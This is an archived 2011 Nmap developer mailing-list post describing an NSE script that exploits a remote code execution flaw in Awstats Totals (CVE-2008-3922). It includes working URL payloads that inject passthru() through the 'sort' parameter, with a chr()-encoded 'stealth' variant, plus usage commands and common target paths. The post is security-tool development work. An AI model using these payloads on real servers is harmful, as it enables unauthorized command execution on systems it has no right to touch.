Nmap Development mailing list archives
Re: http-awstatstotals-exec - Remote code execution exploit for Awstats totals 1.0-1.14
From: Paulino Calderon <paulino () calderonpale com>
Date: Fri, 15 Jul 2011 18:32:12 -0700
On 07/11/2011 02:43 AM, Paulino Calderon wrote:
Hi nmap-dev, description = [[http-awstatstotals-exec exploits a remote code execution vulnerability in Awstats Totals 1.0 up to 1.14 and possibly other products based on it. It works on PHP4 and PHP5 with magic quotes enabled. [CVE: 2008-3922]Stealth mode encodes the command string using PHP's chr() function. Ex. * Normal mode:<code>?sort={%24{passthru%28$_GET[CMD]%29}}{%24{exit%28%29}}&CMD=uname%20-a</code>* Stealth mode:<code>?sort={%24{passthru%28chr(117).chr(110).chr(97).chr(109).chr(101).chr(32).chr(45).chr(97)%29}}{%24{exit%28%29}}</code>Common paths for Awstats Total: * /awstats/index.php * /awstatstotals/index.php * /awstats/awstatstotals.php ]] --- -- @usage-- nmap --script http-awstatstotals-exec.nse --script-args 'http-awstatstotals-exec.cmd="uname -a", http-awstatstotals-exec.stealth, http-awstatstotals-exec.uri=/awstats/index.php' -p80 <host/ip>-- -- @output -- PORT STATE SERVICE REASON -- 80/tcp open http syn-ack-- |_http-awstatstotals-exec.nse: Linux 2.4.19 #1 Son Apr 14 09:53:28 CEST 2002 i686 GNU/Linux-- -- @args http-awstatstotals-exec.uri Awstats Totals URI including path -- @args http-awstatstotals-exec.cmd Command to execute-- @args http-awstatstotals-exec.stealth Stealth mode encodes command payload using PHP's chr()-- @args http-awstatstotals-exec.outfile Output file --- _______________________________________________ Sent through the nmap-dev mailing list http://cgi.insecure.org/mailman/listinfo/nmap-dev Archived at http://seclists.org/nmap-dev/
This update uses PHP's chr() encoding as default.Toni: Thanks for the suggestion. I'll update the output before commiting. I want to get some feedback before regarding how the script should behave since the only way to make sure an installation is vulnerable is by exploiting it and checking.
description = [[http-awstatstotals-exec exploits a remote code execution vulnerability in Awstats Totals 1.0 up to 1.14 and possibly other products based on it. [CVE: 2008-3922]
This vulnerability can be exploited through the GET variable sort. The script queries the web server with the command payload encoded using PHP's chr() function:
<code>?sort={%24{passthru%28chr(117).chr(110).chr(97).chr(109).chr(101).chr(32).chr(45).chr(97)%29}}{%24{exit%28%29}}</code> Common paths for Awstats Total: * <code>/awstats/index.php</code> * <code>/awstatstotals/index.php</code> * <code>/awstats/awstatstotals.php</code> References: * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3922 * http://www.exploit-db.com/exploits/17324/ ]] --- -- @usage-- nmap --script http-awstatstotals-exec.nse --script-args 'http-awstatstotals-exec.cmd="uname -a", http-awstatstotals-exec.uri=/awstats/index.php' -p80 <host/ip>
-- nmap --script http-awstatstotals-exec.nse -p80 <host/ip> -- -- @output -- PORT STATE SERVICE REASON -- 80/tcp open http syn-ack-- |_http-awstatstotals-exec.nse: Linux 2.4.19 #1 Son Apr 14 09:53:28 CEST 2002 i686 GNU/Linux
-- -- @args http-awstatstotals-exec.uri Awstats Totals URI including path -- @args http-awstatstotals-exec.cmd Command to execute -- @args http-awstatstotals-exec.outfile Output file --- -- Other useful args when running this script: -- http.useragent - User Agent to use in GET request -- -- Paulino Calderón Pale Web: http://calderonpale.com Twitter: http://www.twitter.com/paulinocaIderon
Attachment:
http-awstatstotals-exec.nse
Description:
_______________________________________________ Sent through the nmap-dev mailing list http://cgi.insecure.org/mailman/listinfo/nmap-dev Archived at http://seclists.org/nmap-dev/
Current thread:
- http-awstatstotals-exec - Remote code execution exploit for Awstats totals 1.0-1.14 Paulino Calderon (Jul 11)
- Re: http-awstatstotals-exec - Remote code execution exploit for Awstats totals 1.0-1.14 Toni Ruottu (Jul 11)
- Re: http-awstatstotals-exec - Remote code execution exploit for Awstats totals 1.0-1.14 Paulino Calderon (Jul 15)